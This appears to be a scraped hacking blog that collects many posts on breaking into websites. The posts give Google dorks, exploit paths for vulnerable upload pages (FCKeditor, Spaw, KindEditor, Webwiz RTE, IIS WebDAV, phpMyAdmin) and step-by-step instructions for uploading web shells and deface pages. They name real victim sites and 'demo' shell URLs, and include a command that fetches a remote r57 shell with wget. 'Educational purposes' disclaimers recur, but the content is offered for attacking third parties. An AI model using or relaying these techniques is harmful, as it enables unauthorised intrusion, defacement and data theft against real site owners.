Israel Private 0Day Shell Upload Exploits ASP|PHP

Israel Private 0Day Shell Upload Exploits ASP|PHP: Hey Guyz ..Today I found some FRESH Private Israel 0Day Exploits . So i thought of sharing with you all....So lets Start....

Israel Private 0Day Shell Upload Exploits ASP|PHP

1). First 0Day Shell Upload ASP | PHP

# Google Dork -|-

'prod1.aspx?pid=' site:il or You can also create your own Dork

# Exploit Upload 1 -|-
/admin/adminbanners.aspx

# Exploit Upload 2 -|- 
/admin/AdminPics.aspx

When you upload your asp or php shell just Check Code Source of the page you will see your url Shell example: /banners/1a62aa_bddf_4e3d_8464_f0f62ac8c7.asp

# DEMO SHELL -|- 
http://littlebags.co.il/banners/1dea62aa_bddf_4e3d_8464_f640f62ac8c7.asp

Israel Private 0Day Shell Upload Exploits ASP|PHP

2). Second 0day Upload

# Dork -|- 
inurl:/index.php?categoryID= site:il
inurl:/index.php?ukey=auth
inurl:/index.php?ukey=feedback
inurl:/index.php?ukey=pricelist
inurl:/index.php?ukey=auxpage_faq
inurl:/shop/index.php?categoryID=
inurl:ukey=product&productID=

# Exploit -|-
/published/common/html/xinha/plugins/ImageManager/manager.php

‪#‎Exploit‬ -|-
/published/common/html/xinha/plugins/ExtendedFileManager/manager.php

Israel Private 0Day Shell Upload Exploits ASP|PHP

3). Third 0day Upload Blind Sql Injection

 This just Targets with havij or manually and admin page of the script is www.target.co.il/QAdmin

# Dork -|- 

intext:cybercity site:il
inurl:index.php?id= <-- Page 4
intext:medicine site:il
inurl:index.php?id= <-- page 2

So thats it guys we have seen  Israel Private 0Day Shell Upload Exploits ASP|PHP shre it :)

Read more

How to get XSS Pop Up on any Site | Javascript Injection

How to get XSS Pop Up on any Site | Javascript Injection: Hello guys! so today we are going to discuss about javascript injection :P. By you can get XSS Pop up on any site all you need to do is just paste some javascript vectors in console prompt of your browser. How to get XSS Pop Up on any Site | Javascript Injection

By this you can prank your friends just by pasting javascript on a popular sites like facebook in console and take screenshots and simple send it to your friend :P ok so here we start..How to get XSS Pop Up on any Site | Javascript Injection

How to get XSS Pop Up on any Site | Javascript Injection

Javascript Injection: Produce XSS Pop Up on any Site. Basically, its just for fun, but sometimes you can get cookies of vulnerable website by using Javascript injection, ok so lets start..

1). For Chrome open console by Ctrl+Shift+I and paste any of these javascript in console box and get pop up :)

2). Do the same for Firefox :) Ctrl+Shift+I :)

To Alert and Changing Title on Website by Javascript(XSS)

just enter the below javascript in console :)

Javascript: alert(document.title = "title name");

Message On website on alert Box

Just enter this script:

Javascript: alert("you message here");

use this script for more than one message

javascript: alert("First message"); alert("second message"); alert("Third message");

Getting Cookies By javascripts(XSS)

You can also get cookies by javascript(XSS).. just use below scripts :)

alert(document.cookie);
javascript:void(document.cookie="Cookie_name=Cookie_value");
javascript:void(document.cookie="username=user123"); alert(document.cookie);
javascript:void(document.cookie="username=user123"); void(document.cookie="password=pass123"); alert(document.cookie); 

What are you waiting for? Just go ahead and prank your friends :P

So thats it for now if you really enjoyed reading do share and don't forget to leave your feedback :)... 

Read more

Chiangraientersoft HTML Injection Vulnerability

Hello Readers! today im gonna share a HTML Injection Vulnerability. This works most on Thailand web pages :). So lets start..

Chiangraientersoft HTML Injection Vulnerability:

1). Go to google and type any of the following dorks :-

inurl:Qread.php?id_ques=
inurl:webboard/Qread.php?id_ques=
Vulnerable at 'Qform.php' at Field Subject/Title

2). Pick any site!..and replace everything after yoursite.com/ with anyone of the following [Exploit] :

 /webboard/Qform.php
 /board/Qform.php

3). Just fill-up the forum and upload your deface page shell etc..

After your file is successfully uploaded, it would be listed at www.site.com/board/ or www.site.com/webboard/

Read more

Simple Upload 53 Shell Upload Vulnerability

This Vulnerability allows Hacker to upload Shell. Web Application vulnerability in"Simple Upload 53" PHP file allows an attacker to upload Backdoor shell code in your website.

NOTE: THIS IS ONLY FOR EDUCATION PURPOSES, AND FOR SAFETY PURPOSE. WE ARE NOT RESPONSIBLE ANY HARM DONE BY YOU.

Lets Start:-

1). Paste the below dork in the google and click search.

inurl:simple-upload-53.php

2). After you search in Google you will find many Websites containing Simple-Upload-53.php at the end of url. Now simply open any of them.

3). Now you can see the upload option in the site. Here is the vulnerability, it allows you to upload files.
You can upload Backdoor shell as ".php.jpg" or ".php.gif" etc.

4). The uploaded shell will be in this place:

http://www.site.com/files/[Your File]

After uploading the shell , You can hack/deface the site.

Read more

WebTester File Upload Vulnerability

Hello Reader,Hope you all are enjoying my posts.. here Im back with new file upload vulnerability..

called WebTester File Upload Vulnerability . SO lets start..

NOTE: THIS IS ONLY FOR EDUCATION PURPOSES, AND FOR SAFETY PURPOSE. WE ARE NOT RESPONSIBLE ANY HARM DONE BY YOU.

Follow the Instructions:-

1). GO to google and type the following dork..

Google Dork : inurl:go.php?testID= 

For More Results Use your Brain and create your own Dork..

Exploit :http://[target]/[path]/tiny_mce/plugins/filemanager/InsertFile/insert_file.php

2). Now, upload your html , txt or jpg files

3). To find you uploaded file :-

 http://target/path/test-images/[yourfile].html

Enjoy...

Read more

Hack Web Sites Using IIS Exploit [For XP Users]

Hello Readers, I heard some of you are not getting out tutorials because u have no knowledge about Web hacking and you wanna learn web hacking .. So today i decided to write this tutorial for no0bs.

Because in this tutorial we are going to learn about IIS Web Hacking Exploit the Easiest way to hack for Noobs..

NOTE: THIS IS ONLY FOR EDUCATION PURPOSES, AND FOR SAFETY PURPOSE. WE ARE NOT RESPONSIBLE ANY HARM DONE BY YOU.

By using this Exploit an attacker can upload shell , Deface web site delete data etc. etc can do every thing without login..:D . Yeah you heard Right.. I know you all are getting exited, So lets's start :-

Note:- this is only for Windows XP users. For Windows 7 user , i will post soon ...

Follow the Instructions:-

1). First Of all we need to find Vulnerable site. Go to google and type the following dork:-

Dork- Intext:"Powered by IIS

Actually there is no particular dork be Creative use mind and create your own unique dork :) ..

If you are unable to find Don't worry ..See the end of the tutorial i have posted some sites :)

2). After Finding Vuln Site .Click on Start button And open "RUN"

3). Now type the following code in "RUN"

%WINDIR%\EXPLORER.EXE ,::{20D04FE0-3AEA-1069-A2D8-08002B30309D}\::{BDEADF00-C265-11d0-BCED-00A0C90AB50F}

4). Now a FOlder will open named "Web Folders"

Now Right Click in that folder then "New" And then  "Web Folder"..

5). Now paste the url of the Vulnerable site And CLick Next..

6). Now it will ask you to give Name for that Web Folder leave as it is Click Finish..

7). Congratulations! Now you are in the web site..If you wanna upload shell copy your Shell.php in to that folder and your shell will be uploded.. to path

Example : site.com/shell.php

Do the same to upload your deface also :D

Here are some site For Practicing ....  
http://www.houtai123.cn/
http://news.rhvacnet.com/
http://israelshamir.net/
http://intellectual.members.easyspace.com/
http://hoodstarsports.com/
http://jennylo.co.uk/
http://hurrelvisualarts.com/

Soon i will post list of Vuln. sites of IIS Exploit/....

Read more

Portail Dokeos deface and Shell Upload vulnerability

Portail Dokeos Vulnerability is a Kind of FCK Editor Remote file upload Vulnerability..
In this Vulnerability Hacker can upload a shell. deface page or any file on website without admin username and password...
NOTE: THIS IS ONLY FOR EDUCATION PURPOSES, AND FOR SAFETY PURPOSE. WE ARE NOT RESPONSIBLE ANY HARM DONE BY YOU.

Follow the Instructions:-

1). Go to Google and enter the following dork

Google Dork :"Portail Dokeos 1.8.5"

2). Open any site and change the url after site.com to the Exploitable target..For Example:-

Exploit: http://website/patch/main/inc/lib/fckeditor/editor/filemanager/upload/test.html

3). Now change ASP into PHP like FCK editor and Upload you deface shell or file, You can upload, .html .php .jpg .txt formats here..

To view your uploaded file go here : http://website/patch/main/upload/your file here 

Live Demo:-
http://www.kifofy.fr/kcours/main//inc/lib/fckeditor/editor/filemanager/upload/test.html
http://ecampus.webinfo-concept.fr/main//inc/lib/fckeditor/editor/filemanager/upload/test.html

Read more

Encodable Shell File upload Vulnerablity

Yeah read it :) :P

NOTE: THIS IS ONLY FOR EDUCATION PURPOSES, AND FOR SAFETY PURPOSE. WE ARE NOT RESPONSIBLE ANY HARM DONE BY YOU.

Lets Start:-

1). Open google.com and Enter the following dork

Dork: "intext:File Upload by Encodable"

Result comes with 166,000 results.. but some results are fake ... its may be malwares
So pick real things only , "Upload a file" You will this title in search results here :)
Click the sites only which comes with upload a file title..

2). After click the link you'll got a upload form...

3). You'll see some options in this form like name Description email etc ...
type anything in these boxes but add a email in email box, dont use your own
put this one billy@microsoft.com , admin@nasa.gov etc :P

4). Now choose you file and upload it :)

5). After clicking on upload button a pop up will be open ... dont close it, it will automatically closed
after uploading file.

6). In some sites you'll get your uploaded file link after uploading on website
and if you did not file it then try these url

/upload/files/
or /upload/userfiles/

Live Demo : http://www.bellblue.com/cgi-bin/filechucker.cgi

Read more

Upload Shell And Deface Via PhpmyAdmin

Earlier I have posted About How to get Acess to PhpmyAdmin without login through google dorks. As i promised I will post about how to deface using PhpmyAdmin. So here it is Lets start...
NOTE: THIS IS ONLY FOR EDUCATION PURPOSES, AND FOR SAFETY PURPOSE. WE ARE NOT RESPONSIBLE ANY HARM DONE BY YOU.

Requirements(All You Need):-
-You must have the full path 

- pma & mysql db privileges. 

Follow the Instructions:-

1). First login in to mysql. Or you can use these dorks also CLICK HERE.

2). Now click 'Show MySQL system varible" then 'SQL' . Now you can run sql commands,like create db, delete tables or whatever. We want to upload shell so lets move on to it. 

3). Now we will create a cmd line into a new file,with select into. SELECT "" INTO OUTFILE "full/path/here/cmd.php" and click 'Go'. 

4). Now, the cmd line is here http://site.com/cmd.php lets run the command to get shell. wget http://www.r57.biz /r57.txt;mv r57.txt shell.php. Thats all then we av the shell on the site!!..!

Read more

PhpmyAdmin Exploit with Google Dorks

Hello Reader! Today Im going to show you how to exploit PHPmyAdmin with google Dorks. You dont nedd to do any thing no login nothing just put the dork and open any site you will directly go to PHPmyAdmin :).. So let's Start...

NOTE: THIS IS ONLY FOR EDUCATION PURPOSES, AND FOR SAFETY PURPOSE. WE ARE NOT RESPONSIBLE ANY HARM DONE BY YOU.

Follow the Instructions:-
1). Enter the following Dork in Google.

Dork: allinurl:index.php?db=information_schema

2). It will show you about 80,800 Results. So now you can guess how many Vuln  sites are there :D..Open any site you will redirect to PHPmyAdmin...:D

This dork bypasses the admin username and pass and takes You directly to information schema tables to get data and You can delete data

Learn To Deface VIA PhpmyAdmin:-
How to deface using PHPmyAdmin..

Hope you all are enjoying my blog posts...If you like our tutorials please leave valuable comments ...

Read more

Hack Website using Android Phone - Droidsqli

Hello Guys, today we talk about how to hacked a website using your Android phone.We know that in the world 70% website hacked by using SQL injection. For automate SQL injection We need tool or OS - back track, havij or Kali, and etc..But now you can attack on site using your android mobile phone and Tables and hack website using a Android App called Droidsqli.

NOTE: THIS IS ONLY FOR EDUCATION PURPOSES, AND FOR SAFETY PURPOSE. WE ARE NOT RESPONSIBLE ANY HARM DONE BY YOU.

Only you need 3 things:-
1). SQL Vulnerable site:- Learn to find Vuln sites
2). android mobile
3). Droidsqli tool:- Download Here

What is DroidSQLi?
DroidSQLi is the first automated MySQL Injection tool for Android. It allows you to test your MySQL-based web application against SQL injection attacks.

Download(MediaFire):-

http://sh.st/wi81y

Password:- hackers-store.blogspot.com

How to use it?
Itz pretty simple actually coz all the process are done automated here.
All you need to do is find a vulnerable url and put it on Target URL and touch Inject
You will be getting data base and all server info .

DroidSQLi supports the following injection techniques:

• Time based injection
• Blind injection
• Error based injection
• Normal injection

It automatically selects the best technique to use and employs some simple filter evasion methods..! :)

Know more about SqlInjection ..
I am sure you will enjoy using this tool have fun and thanks again.

Read more

0Day Smokybyte SQL Injection Vulnerability 2016

[~] Exploit Title: Smokybyte SQL Injection Vulnerability
[~] Google Dork: intext:"Site by Smokybyte"
[~] Date: 08/04/2014
[~] Exploit Author: Tw-Root [ RedKit ]
[~] Tested on: Windows 7 and 8

Updated! 2016

NOTE: THIS IS ONLY FOR EDUCATION PURPOSES, AND FOR SAFETY PURPOSE. WE ARE NOT RESPONSIBLE ANY HARM DONE BY YOU.

[+] SQLi Exploit : Http://WebSite.Com/[path]/***.php?id=[SQLi]

[+] Demo : http://www.gcircuit.com/gallery-de.php?id=[SQLi]

Order Demos : 

http://www.kantanamotionpictures.com/equ...hp?ic=%271
http://www.bigbluethai.com/popup_clients.php?ic=%2714
http://www.engcorp.co.th/newsDetail.asp?NewsID=%2712
http://www.bangkoksculpturecenter.org/ne...278&Page=1
http://www.pisutshop.com/webboard_detail...ID=%272671
http://www.941hotel.com/newsAndEvent_De.php?id=%274
http://www.satirathai.com/collection.php?ic=%273
http://mscsittipol.com/helpDesk_Cate.php?q=%272

Read more

HACK Website with RTE Webwiz Vulnerability | File Shell upload

HACK Website with RTE Webwiz Vulnerability | File Shell upload:Guyz again I'm here with new WEB VULNERABLITY called HACK Website with RTE Webwiz Vulnerability | File Shell upload.
Webwiz rich text editor HTML code is carried in the open after they are sent charCode due functioning of the page .So Lets start..

Follow The Instructions:-

1). Expolits:-

• site.com/rte/RTE_popup_file_atch.asp 
• site.com/admin/RTE_popup_file_atch.asp

2). Go to google and type one of the following dorks.

• inurl:rte/my_documents/my_files
• inurl:/my_documents/my_files/ 

3). Open any site ..say

site.com/rte/my_documents/my_files/

4). Now replace every thing after site.com with

 rte/RTE_popup_file_atch.asp 

so it will look like-

site.com/rte/RTE_popup_file_atch.asp 

5). Open it and upload you Shell or deface

6). Now click on upload button and after that you will get path to your uploded file in the FILE URL box

Happy hacking.. Only for Educational Purposes..!

Read more

Spaw Shell Upload Vulnerablity

Spaw Shell Upload Vulnerablity:Hello Friends, today I'm going to share another Shell upload Vulnerablity with you all called Spaw Shell Upload Vulnerablity.. 2016

Follow the Instructions:-

1). Go to google and paste one of the following dorks as you like :)

  inurl:"spaw2/dialogs/"
  inurl:"spaw2/uploads/files/"

2). You will get lots of results. Open any site..

For Example i got :- example.com/spaw2/dialogs/

3). Now replace spaw2/dialogs/ with

spaw2/dialogs/dialog.php?module=spawfm&dialog=spawfm&theme=spaw2&lang=es&charset=&scid=cf73b58bb51c52235494da752d98cac9&type=files

  So now our url will look like this :-

example.com/spaw2/dialogs/dialog.php?module=spawfm&dialog=spawfm&theme=spaw2&lang=es&charset=&scid=cf73b58bb51c52235494da752d98cac9&type=files

4). Now open the site and it will look like this->

5). Now upload your deface page.. :)

Happy Hacking..ONly for educational Purposes..

Tags:

• Spaw Shell Upload Vulnerablity
• how to upload shell
• how to hack websites
• defacepage
• deface website
• free shell
• shell upload vulnerablity

Read more

Testing Image Shell and Deface Upload Vulnerability

In this tutorial we are talking about Testing Image Shell and Deface Upload Vulnerability. So lets start..

Follow the Instructions:

1). Search the following dorks.

Dorks:
inurl:"modules/filemanagermodule/actions/?picker.php??id=0"
intitle:"Testing Image Collections"

2). Use both Google and Bing to search the above dork to find more vulnerable websites. 

3). Select any Website from the search result.Find the upload option. in the bottom left corner..

4). Now, Select your deface or Shell and Upload it.

To view your Uploaded shell or deface visit:
http://website.com/files/yourfilehere  

 http://websites.com/path/yourfilehere

Happy Hacking!! Only for Educational purposes..!!

Read more

File Thingie Shell Upload Exploit Vulnerablity

This is a vulnerability which allows a remote attacker to upload his/her deface or shell on the website.

Follow the Steps=>

1). Go to google and search this dork. :)

Google Dork : inurl:ft2.php intext:upload

2). After the searching the above dork, you will get websites vulnerable to this. 

3). Select any website, upload your deface or shell there.

4). To view your deface or shell, just click on your file name after its uploaded.

Happy Hacking .ONly for Educational Purposes ..!!!!!

File Thingie Shell Upload Exploit Vulnerablity
File Thingie Shell Upload
File Thingie Exploit

Read more

File upload vulnerability

1). Go to Google.com and type given below dork..

 allinurl: /cgi-bin/filechucker.cgi

2). Choose a site having title like “Upload a file”,

3). Fill all the fields and upload your deface page or shell..! 

4). Its Uploded :D You just hacked a site !!
As said above now we just have to upload our Deface page here the file uploaded url is given in example if not given you can found your uploaded file at.

example.com/upload/files     or

example.com/upload/userfiles

Here we have uploded our deface page...

Only for Educational purposes..!!

Read more

Tutorial on Defacing with KindEditor Vulnerability

Note==>Tutorial is only for Educational purpose and Hackers Store claims no responsibility on how you use it...

Follow The Steps==>

STEP 1: Go to http://www.google.com/

STEP 2: Copy and Paste this dork

inurl:examples/uploadbutton.html

STEP 3: Choose any site target, then put this exploit behind the site url and enter

/kindeditor/examples/uploadbutton.html

Examples: www.sitetarget.com/kindeditor/examples/uploadbutton.html

STEP 4: After put the exploit, you will see 'upload button'. Click the 'upload button' and choose your Deface Page

STEP 5: If your Deface Page file successfully uploaded, copy the link given beside the 'uplaod button' and paste it behind the url site..

Examples: www.sitetarget.com/(url given)

its just for Educational purpose....!!!

Read more

View any sites in lots of effects

Hello friends, Today in this article I will tell you about How to view any site or add many effects to any site. Yesterday While surfing the net I found this. So I thought of sharing this.

Follow The Steps :---

STEP 1. First Go to addeffects.net.

STEP 2. Then type the url of the site which you want to add effects. Look at the picture below.

STEP 3. Then Click on GO! Button.

STEP 4. Then you will be redirected to a new page . And you can see the picture given below in effect.

STEP 4. To change the effect Click on the drop down menu on the Left top header side. addeffects.net provides more than 130+ effects

Read more

SQL Poison : How to find Vulnerable sites

Sql Poizon tool includes php , asp , rfi , lfi dorks and using this tools you can find vulnerable sites like sql vulnerable sites and you can also find vulnerable sites by country and you can hack sql vulnerable sites using Sql Poizon tool and you can also browse the sites using this tool.

Steps:-

1)  First download SQL Poizon software.

2) Now run Sql Poizon v1.1 - The Exploit Scanner.exe file and you will get the following window.

3) Once you have opened it, you will have to select a dork. I am using an PHP dork in this example. After you have selected the desired dork press Scan and it'll show the results in the Result Panel.

4) Now you have to send the results to the Sqli Crawler. You can do this by rightclicking in the Results Panel and select "Send to Sqli Crawler -> All"

5) Now the Sqli Cralwer tab will open and all you have to do is press Crawl and it will check if the website is really vulnerable to SQL Injection.

6) Now you have to press Export Results and place it somewhere where you can open it later for furthur exploitation.

Read more